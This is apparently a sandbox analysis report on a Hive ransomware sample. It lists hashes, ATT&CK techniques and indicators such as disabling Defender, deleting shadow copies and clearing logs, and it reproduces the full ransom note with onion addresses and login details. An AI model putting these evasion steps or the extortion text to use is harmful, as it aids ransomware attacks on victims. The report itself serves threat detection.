hive | f5901bbb194aa6146a6e7b52ed7901bdd33e3ceaedace85e6499fd15e61c6afe

Analysis

max time kernel
142s
max time network
121s
platform
windows10_x64
resource
win10-en-20211208
submitted
02/01/2022, 04:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
Size

3.8MB
MD5

32bd8e6843879a761e6fa9436a90bb66
SHA1

26dde522d6f3f87ac982495028494c7f50799696
SHA256

87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
SHA512

c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f

Score

10^/10

hive evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Program Files\7-Zip\rFSH_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: egoEr9rRxmaN Password: uSeyh5uRZa9zz1msnzGi To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.bvddx files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command-Line Interface

T1059

pid	Process
424	MpCmdRun.exe

Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3280	bcdedit.exe
3320	bcdedit.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\RedoGet.png => C:\Users\Admin\Pictures\RedoGet.png.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Users\Admin\Pictures\RedoGet.png.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\ui-strings.js.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_radio_selected_18.svg.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_MgAAADIAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\correct.avi	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\bigsmile.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\WideTile.scale-125.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Grace-ul-oob.xrm-ms.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-180.png.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorStoreLogo.contrast-white_scale-200.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\rFSH_HOW_TO_DECRYPT.txt	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\PREVIEW.GIF.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Multiply.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\FullScreen\Windowed-up.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\export.svg.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_PAAAADwAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\rFSH_HOW_TO_DECRYPT.txt	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\rFSH_HOW_TO_DECRYPT.txt	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\THMBNAIL.PNG.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_DgAAAA4AAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\CardBacks\Classic.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\MusicStoreLogo.scale-125_contrast-black.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppPackageLargeTile.scale-125.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\XboxControl\avatar-mask.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_MAAAADAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\rFSH_HOW_TO_DECRYPT.txt	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-80.png.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_JgAAACYAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALNI.TTF.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\hr\msipc.dll.mui.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-32.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-ppd.xrm-ms.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-pl.xrm-ms.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_NAAAADQAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSplashLogo.scale-125.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\rFSH_HOW_TO_DECRYPT.txt	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-20_altform-fullcolor.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\_Resources\0.rsrc	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_forward_18.svg.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\TextureBitmaps\bouquet.jpg	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\headbang.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\malthe.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\PlaneCutMove.scale-140.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\es-ES\msdaprsr.dll.mui	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ppd.xrm-ms.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_NgAAADYAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL090.XML.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_BAAAAAQAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\PREVIEW.GIF.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\SplashScreen.scale-125.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\Square44x44Logo.targetsize-256.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Images\expression_picker_tab_placeholder.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ul-oob.xrm-ms.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_NAAAADQAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail2-ul-oob.xrm-ms.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_IgAAACIAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\rFSH_HOW_TO_DECRYPT.txt	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-24_altform-colorize.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\91.jpg	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\gold_Badge_Earned.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\iheart-radio.scale-100.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_pattern_RHP.png.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.XLA.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AgAAAAIAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-100_kzf8qxf38zg5c\SkypeApp\Assets\delete_12x12.scale-100.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-20_altform-unplated.png	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt.yBcbj9NN3h7czKx4b7d2BmGwyerLNtrmFA4pSmmf_Vz_AAAAAAAAAAA0.bvddx	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
5016	vssadmin.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2136	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2208	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
824	powershell.exe
824	powershell.exe
824	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe
3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	3016	wevtutil.exe
Token: SeBackupPrivilege	3016	wevtutil.exe
Token: SeSecurityPrivilege	4244	wevtutil.exe
Token: SeBackupPrivilege	4244	wevtutil.exe
Token: SeSecurityPrivilege	4040	wevtutil.exe
Token: SeBackupPrivilege	4040	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	4020	wmic.exe
Token: SeSecurityPrivilege	4020	wmic.exe
Token: SeTakeOwnershipPrivilege	4020	wmic.exe
Token: SeLoadDriverPrivilege	4020	wmic.exe
Token: SeSystemProfilePrivilege	4020	wmic.exe
Token: SeSystemtimePrivilege	4020	wmic.exe
Token: SeProfSingleProcessPrivilege	4020	wmic.exe
Token: SeIncBasePriorityPrivilege	4020	wmic.exe
Token: SeCreatePagefilePrivilege	4020	wmic.exe
Token: SeBackupPrivilege	4020	wmic.exe
Token: SeRestorePrivilege	4020	wmic.exe
Token: SeShutdownPrivilege	4020	wmic.exe
Token: SeDebugPrivilege	4020	wmic.exe
Token: SeSystemEnvironmentPrivilege	4020	wmic.exe
Token: SeRemoteShutdownPrivilege	4020	wmic.exe
Token: SeUndockPrivilege	4020	wmic.exe
Token: SeManageVolumePrivilege	4020	wmic.exe
Token: 33	4020	wmic.exe
Token: 34	4020	wmic.exe
Token: 35	4020	wmic.exe
Token: 36	4020	wmic.exe
Token: SeIncreaseQuotaPrivilege	4352	wmic.exe
Token: SeSecurityPrivilege	4352	wmic.exe
Token: SeTakeOwnershipPrivilege	4352	wmic.exe
Token: SeLoadDriverPrivilege	4352	wmic.exe
Token: SeSystemProfilePrivilege	4352	wmic.exe
Token: SeSystemtimePrivilege	4352	wmic.exe
Token: SeProfSingleProcessPrivilege	4352	wmic.exe
Token: SeIncBasePriorityPrivilege	4352	wmic.exe
Token: SeCreatePagefilePrivilege	4352	wmic.exe
Token: SeBackupPrivilege	4352	wmic.exe
Token: SeRestorePrivilege	4352	wmic.exe
Token: SeShutdownPrivilege	4352	wmic.exe
Token: SeDebugPrivilege	4352	wmic.exe
Token: SeSystemEnvironmentPrivilege	4352	wmic.exe
Token: SeRemoteShutdownPrivilege	4352	wmic.exe
Token: SeUndockPrivilege	4352	wmic.exe
Token: SeManageVolumePrivilege	4352	wmic.exe
Token: 33	4352	wmic.exe
Token: 34	4352	wmic.exe
Token: 35	4352	wmic.exe
Token: 36	4352	wmic.exe
Token: SeIncreaseQuotaPrivilege	4352	wmic.exe
Token: SeSecurityPrivilege	4352	wmic.exe
Token: SeTakeOwnershipPrivilege	4352	wmic.exe
Token: SeLoadDriverPrivilege	4352	wmic.exe
Token: SeSystemProfilePrivilege	4352	wmic.exe
Token: SeSystemtimePrivilege	4352	wmic.exe
Token: SeProfSingleProcessPrivilege	4352	wmic.exe
Token: SeIncBasePriorityPrivilege	4352	wmic.exe
Token: SeCreatePagefilePrivilege	4352	wmic.exe
Token: SeBackupPrivilege	4352	wmic.exe
Token: SeRestorePrivilege	4352	wmic.exe
Token: SeShutdownPrivilege	4352	wmic.exe
Token: SeDebugPrivilege	4352	wmic.exe
Token: SeSystemEnvironmentPrivilege	4352	wmic.exe
Token: SeRemoteShutdownPrivilege	4352	wmic.exe
Token: SeUndockPrivilege	4352	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3824 wrote to memory of 744	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	69
PID 3824 wrote to memory of 744	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	69
PID 744 wrote to memory of 4244	744	net.exe	71
PID 744 wrote to memory of 4244	744	net.exe	71
PID 3824 wrote to memory of 4084	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	72
PID 3824 wrote to memory of 4084	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	72
PID 4084 wrote to memory of 4048	4084	net.exe	74
PID 4084 wrote to memory of 4048	4084	net.exe	74
PID 3824 wrote to memory of 3400	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	75
PID 3824 wrote to memory of 3400	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	75
PID 3400 wrote to memory of 4332	3400	net.exe	77
PID 3400 wrote to memory of 4332	3400	net.exe	77
PID 3824 wrote to memory of 4288	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	78
PID 3824 wrote to memory of 4288	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	78
PID 4288 wrote to memory of 4260	4288	net.exe	80
PID 4288 wrote to memory of 4260	4288	net.exe	80
PID 3824 wrote to memory of 4408	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	81
PID 3824 wrote to memory of 4408	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	81
PID 4408 wrote to memory of 4440	4408	net.exe	83
PID 4408 wrote to memory of 4440	4408	net.exe	83
PID 3824 wrote to memory of 4380	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	84
PID 3824 wrote to memory of 4380	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	84
PID 4380 wrote to memory of 3248	4380	net.exe	86
PID 4380 wrote to memory of 3248	4380	net.exe	86
PID 3824 wrote to memory of 3256	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	87
PID 3824 wrote to memory of 3256	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	87
PID 3256 wrote to memory of 3916	3256	net.exe	89
PID 3256 wrote to memory of 3916	3256	net.exe	89
PID 3824 wrote to memory of 4512	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	90
PID 3824 wrote to memory of 4512	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	90
PID 4512 wrote to memory of 2424	4512	net.exe	92
PID 4512 wrote to memory of 2424	4512	net.exe	92
PID 3824 wrote to memory of 532	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	93
PID 3824 wrote to memory of 532	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	93
PID 532 wrote to memory of 816	532	net.exe	95
PID 532 wrote to memory of 816	532	net.exe	95
PID 3824 wrote to memory of 924	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	96
PID 3824 wrote to memory of 924	3824	87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe	96
